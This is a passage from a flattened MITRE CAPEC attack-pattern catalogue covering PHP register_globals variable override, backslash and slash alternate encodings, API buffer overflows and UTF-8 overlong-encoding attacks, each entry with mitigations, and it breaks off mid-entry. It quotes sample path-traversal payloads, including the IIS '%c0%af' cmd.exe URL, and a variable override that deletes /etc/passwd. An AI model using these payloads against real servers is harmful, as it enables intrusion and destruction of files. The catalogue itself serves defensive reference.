ChildOf 171 Exploitation High High Medium All All All All G. Hoglund G. McGraw Exploiting Software: How to Break Code Addison-Wesley February 2004 [R.76.1][REF-2] Cigital, Inc 2007-01-01 [R.76.1][REF-2] Cigital, Inc 2007-01-01 Gunnar Peterson Cigital, Inc 2007-02-28 Fleshed out content to CAPEC schema from the original descriptions in "Exploiting Software" Sean Barnum Cigital, Inc 2007-03-09 Review and revise Richard Struse VOXEM, Inc 2007-03-26 Review and feedback leading to changes in Name and Description Sean Barnum Cigital, Inc 2007-04-16 Modified pattern content according to review and feedback Romain Gaucher Cigital, Inc 2009-02-10 Created draft content for detailed description Sean Barnum Cigital Federal, Inc 2009-04-13 Reviewed and revised content for detailed description MITRE Content Team MITRE 2013-06-21 Updated Example-Instance_Description Gunnar Peterson Cigital, Inc 2007-02-28 Fleshed out content to CAPEC schema from the original descriptions in "Exploiting Software" Sean Barnum Cigital, Inc 2007-03-09 Review and revise Richard Struse VOXEM, Inc 2007-03-26 Review and feedback leading to changes in Name and Description Sean Barnum Cigital, Inc 2007-04-16 Modified pattern content according to review and feedback Romain Gaucher Cigital, Inc 2009-02-10 Created draft content for detailed description Sean Barnum Cigital Federal, Inc 2009-04-13 Reviewed and revised content for detailed description CAPEC Content Team MITRE 2014-02-06 Updated Attack_Phases, Attacker_Skills_or_Knowledge_Required, Solutions_and_Mitigations This attack targets user controlled variables (DEBUG=1, PHP Globals, and So Forth). An attacker can override environment variables leveraging user-supplied, untrusted query variables directly used on the application server without any data sanitization. In extreme cases, the attacker can change variables controlling the business logic of the application. For instance, in languages like PHP, a number of poorly set default configurations may allow the user to override variables. The attacker communicates with the application server using a thin client (browser) or thick client. While communicating with the server, the attacker finds that she can control and override a variable consumed by the application server. The attacker overrides the variable and influences the normal behavior of the application server. A variable consumed by the application server is exposed to the client. A variable consumed by the application server can be overwritten by the user. The application server trusts user supplied data to compute business logic. The application server does not perform proper input validation. Very High Very High Injection Attack Example: PHP Global Variables PHP is a study in bad security. The main idea pervading PHP is "ease of use," and the mantra "don't make the developer go to any extra work to get stuff done" applies in all cases. This is accomplished in PHP by removing formalism from the language, allowing declaration of variables on first use, initializing everything with preset values, and taking every meaningful variable from a transaction and making it available. In cases of collision with something more technical, the simple almost always dominates in PHP. One consequence of all this is that PHP allows users of a Web application to override environment variables with user-supplied, untrusted query variables. Thus, critical values such as the CWD and the search path can be overwritten and directly controlled by a remote anonymous user. Another similar consequence is that variables can be directly controlled and assigned from the user-controlled values supplied in GET and POST request fields. So seemingly normal code like this, does bizarre things: while($count < 10){ // Do something $count++; } Normally, this loop will execute its body ten times. The first iteration will be an undefined zero, and further trips though the loop will result in an increment of the variable $count. The problem is that the coder does not initialize the variable to zero before entering the loop. This is fine because PHP initializes the variable on declaration. The result is code that seems to function, regardless of badness. The problem is that a user of the Web application can supply a request such as GET /login.php?count=9 and cause $count to start out at the value 9, resulting in only one trip through the loop. Yerg. Depending on the configuration, PHP may accept user-supplied variables in place of environment variables. PHP initializes global variables for all process environment variables, such as $PATH and $HOSTNAME. These variables are of critical importance because they may be used in file or network operations. If an attacker can supply a new $PATH variable (such as PATH='/var'), the program may be exploitable. PHP may also take field tags supplied in GET/POST requests and transform them into global variables. This is the case with the $count variable we explored in our previous example. Consider another example of this problem in which a program defines a variable called $tempfile. An attacker can supply a new temp file such as $tempfile = "/etc/passwd". Then the temp file may get erased later via a call to unlink($tempfile);. Now the passwd file has been erased--a bad thing indeed on most OSs. Also consider that the use of include() and require() first search $PATH, and that using calls to the shell may execute crucial programs such as ls. In this way, ls may be "Trojaned" (the attacker can modify $PATH to cause a Trojan copy of ls to be loaded). This type of attack could also apply to loadable libraries if $LD_LIBRARY_PATH is modified. Finally, some versions of PHP may pass user data to syslog as a format string, thus exposing the application to a format string buffer overflow. File upload allows arbitrary file read by setting hidden form variables to match internal variable names (CVE-2000-0860) Low The malicious user can easily try some well-known global variables and find one which matches. Medium The attacker can use automated tools to probe for variables that she can control. The attacker can try to change the value of the variables that are exposed on the webpage's source code and send them back to the application server. Depending on what program is running on the application server, the attacker may know which variables should be targeted. The malicious user may try to guess a global variable just by black box testing at the request level. For instance it is possible to create a variable and assign it a value, then pass it along to the request made to the server. Web penetration tool can be used to automate the discovery of client controlled global variables. A web penetration tool probing a web server may generate abnormal activities recorded on log files. Abnormal traffic such as a high number of request coming from the same client may also rise the warnings from a monitoring system or an intrusion detection tool. Do not allow override of global variables and do Not Trust Global Variables. If the register_globals option is enabled, PHP will create global variables for each GET, POST, and cookie variable included in the HTTP request. This means that a malicious user may be able to set variables unexpectedly. For instance make sure that the server setting for PHP does not expose global variables. A software system should be reluctant to trust variables that have been initialized outside of its trust boundary. Ensure adequate checking is performed when relying on input from outside a trust boundary. Separate the presentation layer and the business logic layer. Variables at the business logic layer should not be exposed at the presentation layer. This is to prevent computation of business logic from user controlled input data. Use encapsulation when declaring your variables. This is to lower the exposure of your variables. Assume all input is malicious. Create a white list that defines all valid input to the software system based on the requirements specifications. Input that does not match against the white list should be rejected by the program. Integrity Modify application data Confidentiality Integrity Availability Execute unauthorized code or commands Run Arbitrary Code Confidentiality Read application data Confidentiality Access_Control Authorization Gain privileges / assume identity The user controlled variable. The new value of the user controlled variable. The command or request interpreter on the server side is responsible for interpreting the global variables. Sometime the global variables are controlled by a setting. For instance in PHP, the Boolean setting "register_globals" defines whether or not to register the EGPCS (Environment, GET, POST, Cookie, Server) variables as global variables. As of PHP 4.2.0, this settings defaults to off. This directive was removed in PHP 6.0.0. Changing the value of a server side variable may have many outcomes. In the case of a DEBUG related variable, there will be an information leak problem. Some other impacts can be privilege escalation, data modification, etc. It really depends on what the variable controls. If a global variable is used for authentication, there may be a vulnerability of privilege escalation. Another common variation of this last problem is to implement a "Remember My Login" feature by storing a user identifier in a cookie, allowing users to change their cookie value to login as whomever they want. 473 Targeted 15 Targeted 285 Secondary 302 Targeted 94 Secondary 96 Secondary 1000 Attack Pattern ChildOf 22 1000 Attack Pattern ChildOf 265 Global variables used on the server side should not be trusted. Override of Global variables should not be allowed. Exploitation High High Medium All All All All G. Hoglund G. McGraw Exploiting Software: How to Break Code Addison-Wesley February 2004 Artur Maj Securing PHP: Step-by-Step Security Focus June 22, 2003 http://www.securityfocus.com/infocus/1706 Clancy Malcolm Ten Security Checks for PHP, Part 1 2003-03-20 PHP Manual Chapter 29. Using Register Globals The PHP Group http://www.php.net/manual/en/security.globals.php [R.77.1][REF-2] Cigital, Inc 2007-03-01 [R.77.1][REF-2] Cigital, Inc 2007-03-01 Eric Dalci Cigital, Inc 2007-02-13 Fleshed out content to CAPEC schema from the original descriptions in "Exploiting Software" Sean Barnum Cigital, Inc 2007-03-07 Review and revise Richard Struse VOXEM, Inc 2007-03-26 Review and feedback leading to changes in Name, Description and Related Attack Patterns Sean Barnum Cigital, Inc 2007-04-16 Modified pattern content according to review and feedback Eric Dalci Cigital, Inc 2007-02-13 Fleshed out content to CAPEC schema from the original descriptions in "Exploiting Software" Sean Barnum Cigital, Inc 2007-03-07 Review and revise Richard Struse VOXEM, Inc 2007-03-26 Review and feedback leading to changes in Name, Description and Related Attack Patterns Sean Barnum Cigital, Inc 2007-04-16 Modified pattern content according to review and feedback CAPEC Content Team MITRE 2014-02-06 Updated Activation_Zone, Attack_Phases, Attacker_Skills_or_Knowledge_Required, Examples-Instances, Related_Guidelines This attack targets the use of the backslash in alternate encoding. An attacker can provide a backslash as a leading character and causes a parser to believe that the next character is special. This is called an escape. By using that trick, the attacker tries to exploit alternate ways to encode the same character which leads to filter problems and opens avenues to attack. The attacker can send input data to the host target (e.g., via http request or command line request The attacker craft malicious input data which includes escaped slashes. The attacker may need multiple attempts before finding a successful combination. The application accepts the backlash character as escape character. The application server does incomplete input data decoding, filtering and validation. High High Injection Protocol Manipulation API Abuse For example, the byte pair \0 might result in a single zero byte (a NULL) being sent. Another example is \t, which is sometimes converted into a tab character. There is often an equivalent encoding between the back slash and the escaped back slash. This means that \/ results in a single forward slash. A single forward slash also results in a single forward slash. The encoding looks like this: / yields / \/ yields / Attack Example: Escaped Slashes in Alternate Encodings An attack leveraging this pattern is very simple. If you believe the target may be filtering the slash, attempt to supply \/ and see what happens. Example command strings to try out include CWD ..\/..\/..\/..\/winnt which converts in many cases to CWD ../../../../winnt To probe for this kind of problem, a small C program that uses string output routines can be very useful. File system calls make excellent testing fodder. The simple snippet int main(int argc, char* argv[]) { puts("\/ \\ \? \. \| "); return 0; } produces the output / \ ? . | Clearly, the back slash is ignored, and thus we have hit on a number of alternative encodings to experiment with. Given our previous example, we can extend the attack to include other possibilities: CWD ..\?\?\?\?\/..\/..\/..\/winnt CWD \.\.\/\.\.\/\.\.\/\.\.\/winnt CWD ..\|\|\|\|\/..\/..\/..\/winnt Low The attacker can naively try backslash character and discover that the target host uses it as escape character. Medium The attacker may need deep understanding of the host target in order to exploit the vulnerability. The attacker may also use automated tools to probe for this vulnerability. An attacker can manually inject backslash characters in the data sent to the target host and observe the results of the request. The attacker may also run scripts or automated tools against the target host to uncover a vulnerability related to the use of the backslash character. A attacker can use a fuzzer in order to probe for this vulnerability. The fuzzer should generate suspicious network activity noticeable by an intrusion detection system. Alternative method of data encoding can be used. Verify that the user-supplied data does not use backslash character to escape malicious characters. Assume all input is malicious. Create a white list that defines all valid input to the software system based on the requirements specifications. Input that does not match against the white list should not be permitted to enter into the system. Be aware of the threat of alternative method of data encoding. Regular expressions can be used to filter out backslash. Make sure you decode before filtering and validating the untrusted input data. In the case of path traversals, use the principle of least privilege when determining access rights to file systems. Do not allow users to access directories/files that they should not access. Any security checks should occur after the data has been decoded and validated as correct data format. Do not repeat decoding process, if bad character are left after decoding process, treat the data as suspicious, and fail the validation process. Avoid making decisions based on names of resources (e.g. files) if those resources can have alternate names. Confidentiality Read application data Read files or directories Availability DoS: resource consumption (memory) Denial of Service Confidentiality Integrity Availability Execute unauthorized code or commands Run Arbitrary Code Confidentiality Access_Control Authorization Bypass protection mechanism The user supplied data (e.g., HTTP request) The backslash character injected in the user supplied data. The backslash character can be obfuscated with alternate encoding. The command or request interpreter used on the host target may consider the backslash character as escape character. The character following the backslash character will be escaped (i.e, unfiltered) and may cause harmful effects. 180 Targeted 181 Targeted 173 Targeted 171 Targeted 172 Targeted 73 Targeted 21 Targeted 22 Targeted 74 Targeted 20 Targeted 697 Targeted 707 Targeted 1000 Attack Pattern PeerOf 64 1000 Attack Pattern ChildOf 79 1000 Attack Pattern PeerOf 71 1000 Attack Pattern PeerOf 43 1000 Attack Pattern ChildOf 267 1000 Category ChildOf 126 All client-supplied input must be validated through filtering and all output must be properly escaped. Reluctance to Trust Never trust user-supplied input. Penetration Exploitation High High Medium All All All All G. Hoglund G. McGraw Exploiting Software: How to Break Code Addison-Wesley February 2004 Common Weakness Enumeration (CWE) CWE-20 - Input Validation Draft The MITRE Corporation 2007 http://cwe.mitre.org/data/definitions/20.html [R.78.1][REF-2] Cigital, Inc 2007-03-01 [R.78.1][REF-2] Cigital, Inc 2007-03-01 Eric Dalci Cigital, Inc 2007-02-13 Fleshed out content to CAPEC schema from the original descriptions in "Exploiting Software" Sean Barnum Cigital, Inc 2007-03-07 Review and revise Richard Struse VOXEM, Inc 2007-03-26 Review and feedback leading to changes in Related Attack Patterns Sean Barnum Cigital, Inc 2007-04-16 Modified pattern content according to review and feedback Eric Dalci Cigital, Inc 2007-02-13 Fleshed out content to CAPEC schema from the original descriptions in "Exploiting Software" Sean Barnum Cigital, Inc 2007-03-07 Review and revise Richard Struse VOXEM, Inc 2007-03-26 Review and feedback leading to changes in Related Attack Patterns Sean Barnum Cigital, Inc 2007-04-16 Modified pattern content according to review and feedback CAPEC Content Team MITRE 2013-12-18 Updated Related_Attack_Patterns CAPEC Content Team MITRE 2014-02-06 Updated Attack_Phases This attack targets the encoding of the Slash characters. An attacker would try to exploit common filtering problems related to the use of the slashes characters to gain access to resources on the target host. Directory-driven systems, such as file systems and databases, typically use the slash character to indicate traversal between directories or other container components. For murky historical reasons, PCs (and, as a result, Microsoft OSs) choose to use a backslash, whereas the UNIX world typically makes use of the forward slash. The schizophrenic result is that many MS-based systems are required to understand both forms of the slash. This gives the attacker many opportunities to discover and abuse a number of common filtering problems. The goal of this pattern is to discover server software that only applies filters to one version, but not the other. The attacker has access to a resource path and required to use slashes as resource delimiter. The attacker tries variation and combination of the slashes characters in different encoding format. The attacker found an unfiltered combination which maps to a valid path and accesses unauthorized resources (directories, files, etc.) The application server accepts paths to locate resources. The application server does insufficient input data validation on the resource path requested by the user. The access right to resources are not set properly. High High Injection Protocol Manipulation API Abuse Attack Example: Slashes in Alternate Encodings The two following requests are equivalent on most Web servers: http://target server/some_directory\..\..\..\winnt is equivalent to http://target server/some_directory/../../../winnt Multiple encoding conversion problems can also be leveraged as various slashes are instantiated in URL-encoded, UTF-8, or unicode. Consider the strings http://target server/some_directory\..%5C..%5C..\winnt where %5C is equivalent to the \ character. Low An attacker can try variation of the slashes characters. Medium An attacker can use more sophisticated tool or script to scan a website and find a path filtering problem. An attacker can try different encoding formats for the slashes characters and see if they produce the same filtering results. Automated tools such as fuzzer can be used to test the URL decoding and filtering. Custom scripts can also be used. For example, a good script for verifying the correct interpretation of UTF-8 encoded characters can be found at http://www.cl.cam.ac.uk/~mgk25/ucs/examples/UTF-8-test.txt If the first path decoding process has left some invalid or blacklisted characters, that may be a sign that the request is malicious. Traffic filtering with IDS (or proxy) can detect request with suspicious URLs. IDS may use signature based identification to reveal such URL based attacks. A attacker can use a fuzzer in order to probe for a UTF-8 encoding vulnerability. The fuzzer should generate suspicious network activity. Typically the obfuscation here is the use of different alternate encoding format (UTF-8, Unicode, etc,) Any security checks should occur after the data has been decoded and validated as correct data format. Do not repeat decoding process, if bad character are left after decoding process, treat the data as suspicious, and fail the validation process. Refer to the RFCs to safely decode URL. When client input is required from web-based forms, avoid using the "GET" method to submit data, as the method causes the form data to be appended to the URL and is easily manipulated. Instead, use the "POST method whenever possible. There are tools to scan HTTP requests to the server for valid URL such as URLScan from Microsoft (http://www.microsoft.com/technet/security/tools/urlscan.mspx) Be aware of the threat of alternative method of data encoding and obfuscation technique such as IP address encoding. (See related guideline section) Test your path decoding process against malicious input. In the case of path traversals, use the principle of least privilege when determining access rights to file systems. Do not allow users to access directories/files that they should not access. Assume all input is malicious. Create a white list that defines all valid input to the application based on the requirements specifications. Input that does not match against the white list should not be permitted to enter into the system. Confidentiality Read application data Confidentiality Integrity Availability Execute unauthorized code or commands Run Arbitrary Code Confidentiality Access_Control Authorization Gain privileges / assume identity The injection vector is a string path such as URL path. The injection vector is a string path with malicious slashes characters. Alternate encoding format can also be used to code the slashes characters. The impact of the payload is access to unauthorized resources. 173 Targeted 171 Targeted 180 Targeted 181 Targeted 20 Targeted 74 Targeted 73 Targeted 21 Targeted 22 Targeted 185 Secondary 200 Secondary 697 Targeted 707 Targeted 1000 Attack Pattern PeerOf 71 1000 Attack Pattern PeerOf 43 1000 Attack Pattern ChildOf 267 1000 Category ChildOf 126 Least privilege Reluctance to trust Penetration Exploitation High High Medium All All All All G. Hoglund G. McGraw Exploiting Software: How to Break Code Addison-Wesley February 2004 Markus Kuhn UTF-8 and Unicode FAQ for Unix/Linux June 4, 1999 http://www.cl.cam.ac.uk/~mgk25/unicode.html Gunter Ollmann URL Encoded Attacks - Attacks using the common web browser CGISecurity.com http://www.cgisecurity.com/lib/URLEmbeddedAttacks.html [R.79.1][REF-2] Cigital, Inc 2007-03-01 [R.79.1][REF-2] Cigital, Inc 2007-03-01 Eric Dalci Cigital, Inc 2007-02-13 Fleshed out content to CAPEC schema from the original descriptions in "Exploiting Software" Sean Barnum Cigital, Inc 2007-03-07 Review and revise Richard Struse VOXEM, Inc 2007-03-26 Review and feedback leading to changes in Related Attack Patterns Sean Barnum Cigital, Inc 2007-04-16 Modified pattern content according to review and feedback Eric Dalci Cigital, Inc 2007-02-13 Fleshed out content to CAPEC schema from the original descriptions in "Exploiting Software" Sean Barnum Cigital, Inc 2007-03-07 Review and revise Richard Struse VOXEM, Inc 2007-03-26 Review and feedback leading to changes in Related Attack Patterns Sean Barnum Cigital, Inc 2007-04-16 Modified pattern content according to review and feedback CAPEC Content Team MITRE 2013-12-18 Updated Related_Attack_Patterns CAPEC Content Team MITRE 2014-02-06 Updated Attack_Phases, Indicators-Warnings_of_Attack, Solutions_and_Mitigations This attack targets libraries or shared code modules which are vulnerable to buffer overflow attacks. An attacker who has access to an API may try to embed malicious code in the API function call and exploit a buffer overflow vulnerability in the function's implementation. All clients that make use of the code library thus become vulnerable by association. This has a very broad effect on security across a system, usually affecting more than one software process. An attacker can call an API exposed by the target host. On the probing stage, the attacker injects malicious code using the API call and observes the results. The attacker's goal is to uncover a buffer overflow vulnerability. The attacker finds a buffer overflow vulnerability, crafts malicious code and injects it through an API call. The attacker can at worst execute remote code on the target host. The target host exposes an API to the user. One or more API functions exposed by the target host has a buffer overflow vulnerability. High High API Abuse Injection Attack Example: Libc in FreeBSD A buffer overflow in the FreeBSD utility setlocale (found in the libc module) puts many programs at risk all at once. Xtlib A buffer overflow in the Xt library of the X windowing system allows local users to execute commands with root privileges. Low An attacker can simply overflow a buffer by inserting a long string into an attacker-modifiable injection vector. The result can be a DoS. High Exploiting a buffer overflow to inject malicious code into the stack of a software system or even the heap can require a higher skill level. Use a language or compiler that performs automatic bounds checking. Use secure functions not vulnerable to buffer overflow. If you have to use dangerous functions, make sure that you do boundary checking. Compiler-based canary mechanisms such as StackGuard, ProPolice and the Microsoft Visual Studio /GS flag. Unless this provides automatic bounds checking, it is not a complete solution. Use OS-level preventative functionality. Not a complete solution. Availability DoS: crash / exit / restart Confidentiality Integrity Availability Execute unauthorized code or commands Run Arbitrary Code Confidentiality Read memory Integrity Modify memory The user supplied data. The buffer overrun by the attacker. When the function returns control to the main program, it jumps to the return address portion of the stack frame. Unfortunately that return address may have been overwritten by the overflowed buffer and the address may contain a call to a privileged command or to a malicious code. The most common is remote code execution. 120 Targeted 119 Targeted 118 Targeted 74 Targeted 20 Targeted 680 Targeted 733 Secondary 697 Targeted 1000 Attack Pattern ChildOf 100 Bound checking should be performed when copying data to a buffer. Reluctance to trust Defense in Depth Penetration High High High All All All All G. Hoglund G. McGraw Exploiting Software: How to Break Code Addison-Wesley February 2004 Common Weakness Enumeration (CWE) CWE-119: Buffer Errors Draft The MITRE Corporation 2007 http://cwe.mitre.org/data/definitions/119.html [R.8.1][REF-2] Cigital, Inc 2007-03-01 [R.8.1][REF-2] Cigital, Inc 2007-03-01 Eric Dalci Cigital, Inc 2007-02-13 Fleshed out content to CAPEC schema from the original descriptions in "Exploiting Software" Sean Barnum Cigital, Inc 2007-03-05 Review and revise Richard Struse VOXEM, Inc 2007-03-26 Review and feedback leading to changes in Description Sean Barnum Cigital, Inc 2007-04-13 Modified pattern content according to review and feedback MITRE Content Team MITRE 2013-06-21 Updated Skill_or_Knowledge_Level and Skill_or_Knowledge_Type Eric Dalci Cigital, Inc 2007-02-13 Fleshed out content to CAPEC schema from the original descriptions in "Exploiting Software" Sean Barnum Cigital, Inc 2007-03-05 Review and revise Richard Struse VOXEM, Inc 2007-03-26 Review and feedback leading to changes in Description Sean Barnum Cigital, Inc 2007-04-13 Modified pattern content according to review and feedback CAPEC Content Team MITRE 2014-02-06 Updated Attack_Phases This attack is a specific variation on leveraging alternate encodings to bypass validation logic. This attack leverages the possibility to encode potentially harmful input in UTF-8 and submit it to applications not expecting or effective at validating this encoding standard making input filtering difficult. UTF-8 (8-bit UCS/Unicode Transformation Format) is a variable-length character encoding for Unicode. Legal UTF-8 characters are one to four bytes long. However, early version of the UTF-8 specification got some entries wrong (in some cases it permitted overlong characters). UTF-8 encoders are supposed to use the "shortest possible" encoding, but naive decoders may accept encodings that are longer than necessary. According to the RFC 3629, a particularly subtle form of this attack can be carried out against a parser which performs security-critical validity checks against the UTF-8 encoded form of its input, but interprets certain illegal octet sequences as characters. Survey the application for user-controllable inputs Using a browser or an automated tool, an attacker follows all public links and actions on a web site. He records all the links, the forms, the resources accessed and all other potential entry-points for the web application. Use a spidering tool to follow and record all links and analyze the web pages to find entry points. Make special note of any links that include parameters in the URL. env-Web Use a proxy tool to record all user input entry points visited during a manual traversal of the web application. env-Web Use a browser to manually explore the website and analyze how it is constructed. Many browsers' plugins are available to facilitate the analysis or automate the discovery. env-Web Inputs are used by the application or the browser (DOM) env-Web Using URL rewriting, parameters may be part of the URL path. env-Web No parameters appear to be used on the current page. Even though none appear, the web application may still use them if they are provided. env-Web Applications that have only static pages or that simply present information without accepting input are unlikely to be susceptible. env-Web A list of URLs, with their corresponding parameters (POST, GET, COOKIE, etc.) is created by the attacker. A list of application user interface entry fields is created by the attacker. A list of resources accessed by the application is created by the attacker. Monitor velocity of page fetching in web logs. Humans who view a page and select a link from it will click far slower and far less regularly than tools. Tools make requests very quickly and the requests are typically spaced apart regularly (e.g. 0.8 seconds between them). Create links on some pages that are visually hidden from web browsers. Using iframes, images, or other HTML techniques, the links can be hidden from web browsing humans, but visible to spiders and programs. A request for the page, then, becomes a good predictor of an automated tool probing the application. Use CAPTCHA to prevent the use of the application by an automated tool. Actively monitor the application and either deny or redirect requests from origins that appear to be automated. Probe entry points to locate vulnerabilities The attacker uses the entry points gathered in the "Explore" phase as a target list and injects various UTF-8 encoded payloads to determine if an entry point actually represents a vulnerability with insufficient validation logic and to characterize the extent to which the vulnerability can be exploited. Try to use UTF-8 encoding of content in Scripts in order to bypass validation routines. env-Web Try to use UTF-8 encoding of content in HTML in order to bypass validation routines. env-Web Try to use UTF-8 encoding of content in CSS in order to bypass validation routines. env-Web The application accepts user-controllable input. env-Web The attacker's UTF-8 encoded payload is processed and acted on by the application without filtering or transcoding The application decodes the charset and filters the inputs. Implement input validation routines that filter or transcode for UTF-8 content. Specify the charset of the HTTP transaction/content. Monitor inputs to web servers. Alert on unusual charset and/or characters. Actively monitor the application and either deny or redirect requests from origins that appear to be attack attempts. The application's UTF-8 decoder accepts and interprets illegal UTF-8 characters or non-shortest format of UTF-8 encoding. Input filtering and validating is not done properly leaving the door open to harmful characters for the target host. High High Injection Protocol Manipulation API Abuse Perhaps the most famous UTF-8 attack was against unpatched Microsoft Internet Information Server (IIS) 4 and IIS 5 servers. If an attacker made a request that looked like this http://servername/scripts/..%c0%af../winnt/system32/ cmd.exe the server didn't correctly handle %c0%af in the URL. What do you think %c0%af means? It's 11000000 10101111 in binary; and if it's broken up using the UTF-8 mapping rules, we get this: 11000000 10101111. Therefore, the character is 00000101111, or 0x2F, the slash (/) character! The %c0%af is an invalid UTF-8 representation of the / character. Such an invalid UTF-8 escape is often referred to as an overlong sequence. So when the attacker requested the tainted URL, he accessed http://servername/scripts/../../winnt/system32/cmd.exe In other words, he walked out of the script's virtual directory, which is marked to allow program execution, up to the root and down into the system32 directory, where he could pass commands to the command shell, Cmd.exe. CVE-2000-0884 Low An attacker can inject different representation of a filtered character in UTF-8 format. Medium An attacker may craft subtle encoding of input data by using the knowledge that she has gathered about the target host. Attacker may try to inject dangerous characters using UTF-8 different representation using (example of invalid UTF-8 characters). The attacker hopes that the targeted system does poor input filtering for all the different possible representations of the malicious characters. Malicious inputs can be sent through an HTML form or directly encoded in the URL. The attacker can use scripts or automated tools to probe for poor input filtering. A web page that contains overly long UTF-8 codes constitute a protocol anomaly, and could be an indication that an attacker is attempting to exploit a vulnerability on the target host. A attacker can use a fuzzer in order to probe for a UTF-8 encoding vulnerability. The fuzzer should generate suspicious network activity noticeable by an intrusion detection system. An IDS filtering network traffic may be able to detect illegal UTF-8 characters. According to OWASP, sometimes cross-site scripting attackers attempt to hide their attacks in Unicode encoding. The Unicode Consortium recognized multiple representations to be a problem and has revised the Unicode Standard to make multiple representations of the same code point with UTF-8 illegal. The UTF-8 Corrigendum lists the newly restricted UTF-8 range (See references). Many current applications may not have been revised to follow this rule. Verify that your application conform to the latest UTF-8 encoding specification. Pay extra attention to the filtering of illegal characters. The exact response required from an UTF-8 decoder on invalid input is not uniformly defined by the standards. In general, there are several ways a UTF-8 decoder might behave in the event of an invalid byte sequence: 1. Insert a replacement character (e.g. '?', ''). 2. Ignore the bytes. 3. Interpret the bytes according to a different character encoding (often the ISO-8859-1 character map). 4. Not notice and decode as if the bytes were some similar bit of UTF-8. 5. Stop decoding and report an error (possibly giving the caller the option to continue). It is possible for a decoder to behave in different ways for different types of invalid input. RFC 3629 only requires that UTF-8 decoders must not decode "overlong sequences" (where a character is encoded in more bytes than needed but still adheres to the forms above). The Unicode Standard requires a Unicode-compliant decoder to "...treat any ill-formed code unit sequence as an error condition. This guarantees that it will neither interpret nor emit an ill-formed code unit sequence." Overlong forms are one of the most troublesome types of UTF-8 data. The current RFC says they must not be decoded but older specifications for UTF-8 only gave a warning and many simpler decoders will happily decode them. Overlong forms have been used to bypass security validations in high profile products including Microsoft's IIS web server. Therefore, great care must be taken to avoid security issues if validation is performed before conversion from UTF-8, and it is generally much simpler to handle overlong forms before any input validation is done. To maintain security in the case of invalid input, there are two options. The first is to decode the UTF-8 before doing any input validation checks. The second is to use a decoder that, in the event of invalid input, returns either an error or text that the application considers to be harmless. Another possibility is to avoid conversion out of UTF-8 altogether but this relies on any other software that the data is passed to safely handling the invalid data. Another consideration is error recovery. To guarantee correct recovery after corrupt or lost bytes, decoders must be able to recognize the difference between lead and trail bytes, rather than just assuming that bytes will be of the type allowed in their position. For security reasons, a UTF-8 decoder must not accept UTF-8 sequences that are longer than necessary to encode a character. If you use a parser to decode the UTF-8 encoding, make sure that parser filter the invalid UTF-8 characters (invalid forms or overlong forms). Look for overlong UTF-8 sequences starting with malicious pattern. You can also use a UTF-8 decoder stress test to test your UTF-8 parser (See Markus Kuhn's UTF-8 and Unicode FAQ in reference section) Assume all input is malicious. Create a white list that defines all valid input to the software system based on the requirements specifications. Input that does not match against the white list should not be permitted to enter into the system. Test your decoding process against malicious input. Confidentiality Access_Control Authorization Bypass protection mechanism Confidentiality Integrity Availability Execute unauthorized code or commands Run Arbitrary Code Integrity Modify memory Availability Unexpected State The injection vector is an illegal sequences of bytes matching an UTF-8 characters or a "non-shortest form" in UTF-8 encoding format. The interpretation of malicious characters can cause unexpected responses from the target host. The request or command interpreter is responsible for interpreting the request sent by the client. The malicious characters can defeat the data filtering mechanism and have many different outcomes such as path manipulation, remote code execution, etc. 173 Targeted 172 Targeted 180 Targeted 181 Targeted 171 Secondary 73 Targeted 21 Targeted 74 Secondary 20 Secondary 697 Targeted 692 Targeted 1000 Attack Pattern PeerOf 64 1000 Attack Pattern PeerOf 71 1000 Attack Pattern ChildOf 267 Reluctance to Trust RFC 3629 - http://www.faqs.org/rfcs/rfc3629.html Penetration High High Medium All All All All G. Hoglund G. McGraw Exploiting Software: How to Break Code Addison-Wesley February 2004 Common Weakness Enumeration (CWE) CWE-20 - Input Validation Draft The MITRE Corporation 2007 http://cwe.mitre.org/data/definitions/20.html David Wheeler Secure Programming for Linux and Unix HOWTO 5.9. Character Encoding http://www.dwheeler.com/secure-programs/Secure-Programs-HOWTO/character-encoding.html Michael Howard David LeBlanc Writing Secure Code Chapter 12 Microsoft Press Bruce Schneier Crypto-Gram Newsletter 2000-07-15 http://www.schneier.com/crypto-gram-0007.html Wikipedia UTF-8 The Wikimedia Foundation, Inc http://en.wikipedia.org/wiki/UTF-8 F. Yergeau RFC 3629 - UTF-8, a transformation format of ISO 10646 November 2003 http://www.faqs.org/rfcs/rfc3629.html Eric Hacker IDS Evasion with Unicode January 3, 2001 http://www.securityfocus.com/infocus/1232 Corrigendum #1: UTF-8 Shortest Form The Unicode Standard Unicode, Inc. March 2001 http://www.unicode.org/versions/corrigendum1.html Markus Kuhn UTF-8 and Unicode FAQ for Unix/Linux June 4, 1999 http://www.cl.cam.ac.uk/~mgk25/unicode.html Markus Kuhn UTF-8 decoder capability and stress test February 19, 2003 http://www.cl.cam.ac.uk/%7Emgk25/ucs/examples/UTF-8-test.txt [R.80.1][REF-2] Cigital, Inc 2007-03-01 [R.80.1][REF-2] Cigital, Inc 2007-03-01 Eric Dalci Cigital, Inc 2007-02-13 Fleshed out content to CAPEC schema from the original descriptions in "Exploiting Software" Sean Barnum Cigital, Inc 2007-03-07 Review and revise Richard Struse VOXEM, Inc 2007-03-26 Review and feedback leading to changes in Name, Description and Related Attack Patterns Sean Barnum Cigital, Inc 2007-04-16 Modified pattern content according to review and feedback Romain Gaucher Cigital, Inc 2009-02-10 Created draft content for detailed description Sean Barnum Cigital Federal, Inc 2009-04-13 Reviewed and revised content for detailed description MITRE Content Team MITRE 2013-06-21 Updated Example-Instance_Description Eric Dalci Cigital, Inc 2007-02-13 Fleshed out content to CAPEC schema from the original descriptions in "Exploiting Software" Sean Barnum Cigital, Inc 2007-03-07 Review and revise Richard Struse VOXEM, Inc 2007-03-26 Review and feedback leading to changes in Name, Description and Related Attack Patterns Sean Barnum Cigital, Inc 2007-04-16 Modified pattern content according to review and feedback Romain Gaucher Cigital, Inc 2009-02-10 Created draft content for detailed description Sean Barnum Cigital Federal, Inc 2009-04-13 Reviewed and revised content for detailed description CAPEC Content Team MITRE 2014-02-06 Updated Attack_Phases Web Logs Tampering attacks involve an attacker injecting, deleting or otherwise tampering with the contents of web logs typically for the purposes of masking other malicious behavior. Additionally, writing malicious data to log files may target jobs, filters, reports, and other agents that process the logs in an asynchronous attack pattern. This pattern of attack is similar to "Log Injection-Tampering-Forging" except that in this case, the attack is targeting the logs of the web server and not the application. Determine Application Web Server Log File Format The attacker observes the system and looks for indicators of which logging utility is being used by the web server. Determine logging utility being used by application web server (e.g. log4j), only possible if the application is known by the attacker or if the application returns error messages with logging utility information. env-Web Attacker determines log file format used by application web server. Attacker cannot conclusively determine log file format; he/she can only guess what the format is. Determine Injectable 